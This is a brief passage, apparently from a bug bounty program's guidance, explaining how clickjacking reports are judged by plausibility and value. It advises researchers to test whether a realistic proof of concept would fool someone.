Clickjacking attacks rely on an attacker convincing a victim to casually interact with a malicious website, without realizing that some of the clicks may actually be delivered to another, framed origin.

Some of the reports of clickjacking attacks submitted through our form require exceptionally complex or implausible interactions with the malicious site: say, clicking 10 times, pressing "r", and then hitting Enter. When evaluating reports, we take a pragmatic approach: if we feel that a real-life attack would be very difficult to orchestrate, and the safeguarded functionality is of relatively modest value to the attacker to begin with, we will probably not reward the report.

Conclusion

When in doubt, it is always useful to put together a reasonably realistic proof-of-concept exploit and ask yourself or a fellow researcher if they would have fallen for it. If the answer is "no", we'll probably share the sentiment :-).